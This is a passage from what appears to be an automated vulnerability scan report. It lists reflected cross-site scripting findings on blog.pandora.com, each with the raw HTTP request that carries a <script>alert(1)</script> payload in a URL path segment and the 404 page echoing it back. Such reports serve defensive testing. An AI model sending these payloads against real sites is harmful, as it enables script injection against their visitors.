GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p>
...[SNIP]...

3.29. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p>
...[SNIP]...

3.30. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p>
...[SNIP]...

3.31. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p>
...[SNIP]...

3.32. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p>
...[SNIP]...

3.33. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p>
...[SNIP]...

3.34. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p>
...[SNIP]...

3.35. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p>
...[SNIP]...

3.36. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p>
...[SNIP]...

3.37. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p>
...[SNIP]...

3.38. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p>
...[SNIP]...

3.39. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p>
...[SNIP]...

3.40. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p>
...[SNIP]...

3.41. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p>
...[SNIP]...

3.42. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p>
...[SNIP]...

3.43. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p>
...[SNIP]...

3.44. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p>
...[SNIP]...

3.45. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
